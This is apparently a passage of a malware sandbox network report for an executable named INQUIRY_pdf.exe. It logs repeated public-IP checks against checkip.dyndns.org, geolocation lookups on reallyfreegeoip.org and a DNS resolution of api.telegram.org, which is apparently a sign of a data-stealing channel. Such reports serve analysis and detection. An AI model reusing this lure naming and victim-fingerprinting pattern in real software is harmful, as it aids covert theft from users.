Nov 18, 2024 18:40:57.519452095 CET	1.1.1.1	192.168.2.4	0x21e1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:40:57.519452095 CET	1.1.1.1	192.168.2.4	0x21e1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:41:16.741288900 CET	1.1.1.1	192.168.2.4	0x8981	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:40:56.285932064 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:40:57.179640055 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:40:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6efceb84b617bd35186c85c98cc59d5a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:40:57.192354918 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:40:57.468889952 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:40:57 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1c29d281ba80ca83a3c347ec6ce4d0fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:40:58.427261114 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:40:58.692256927 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:40:58 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6469c30cca55cbf8e57a027110189797 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:40:59.531682014 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:41:00.406240940 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d83e5548b8e89d883c4eee537bf600d2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:01.562603951 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:02.421694994 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:02 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 269cef3f2985fd9fcf7a5359f24f66f9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:03.300045967 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:04.163429022 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:04 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5f612a0a31df16ec047c3f4cd28c63f5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:05.046948910 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:08.088654995 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 41983db86b857dbc2ff4637afc9fc090 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:41:08.203176975 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 41983db86b857dbc2ff4637afc9fc090 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:09.553430080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:10.937068939 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d90adc937ee4e6f995e27c37903ca7e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:41:10.937495947 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d90adc937ee4e6f995e27c37903ca7e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:41:10.938139915 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d90adc937ee4e6f995e27c37903ca7e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:12.093825102 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:12.981564999 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 657da2593a2448406940038e11c14c26 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	132.226.247.73	80	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:41:13.867472887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:41:15.783998013 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: af1cc71fc3c29709359b11c2813b4628 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:40:58 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:40:58 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:40:58 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 53132 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2yyq%2FgWWc1oKIheL2xVuaGWFkfj8GQN3fZfemjrSKrhL3OSv9XpeWOyWbbCKRF6LwLx51ZODQhxx%2F3S%2BFK2dFEIrrJIwc1OFmTpoqsMAO9iYylh%2BAV%2FB9X2gH%2F9S8G8wcl6XcZd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfa88fa17b2a-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19188&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=150707&cwnd=32&unsent_bytes=0&cid=f9fe0a723357f99f&ts=231&x=0"
2024-11-18 17:40:58 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:40:59 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:40:59 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:40:59 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 7697 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCVL8Onwe2eYZShOurGCtpm6PRWphETH%2BHWbhtcKpc9sAQ%2Fy%2F1pWIAKNqdxUaXGzKoob%2FaDZlI%2F8rW7mbiiC8xzVIq2%2FHKBy23Y%2BROtyFsLJl8Ts3qlz9xB9rOxqk1WWPDdfCTrb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfaf5c0d53e7-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18862&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=153682&cwnd=32&unsent_bytes=0&cid=37c73f07337b6529&ts=168&x=0"
2024-11-18 17:40:59 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:01 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:41:01 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:01 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1730 Last-Modified: Mon, 18 Nov 2024 17:12:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8S6h1kuf0f0%2BU3t%2BUMBTN9ghshKyjEaDGUn9p2ZBFtw704ymWrMgcdaJpkg3oV54wBmam0UbdgUI%2BuJJCupSNHADcmDB2X4Z1V%2Fa1siUQa9cu%2BYxK%2BKhFrXvBNZijrq4mAK%2B2mze"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfbbd9d3a1d2-MSP alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27733&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=104052&cwnd=32&unsent_bytes=0&cid=2f29687b02afe205&ts=419&x=0"
2024-11-18 17:41:01 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:03 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:41:03 UTC	846	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:03 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1731 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04tolPGjHsPGMn6ULZmryhx5DPP88K7X8NBjj6kGKzkDo43ju%2F5SPjJk%2BWmnxmLIYNYY8QMCJE2FkmkPlQovYLwQbjONtHExXn8YwlWlv73H8k3WRBbVsQQrYR5Znzw6nMapOGPO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfc6e9f12c34-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=117551&cwnd=32&unsent_bytes=0&cid=f099a3e0c8c760de&ts=188&x=0"
2024-11-18 17:41:03 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	188.114.97.3	443	7648	C:\Users\user\Desktop\INQUIRY_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:41:04 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:41:05 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:41:04 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 53138 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABGpfCLIV%2FlM5Di83MvGHkMFnbvbGroP5YMk%2BIfOHWCHx0xhZSOUAvapPu8s8tu0sgj6u1gWCNO7LEdNNOZUheGZjrSbBZoYXFWJ8Am5W7C3NUliZRAjVgZEzQ7je%2BdhiizQLmCo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49bfd1dd697c32-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22934&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=126711&cwnd=32&unsent_bytes=0&cid=7a23e22b189ea726&ts=206&x=0"
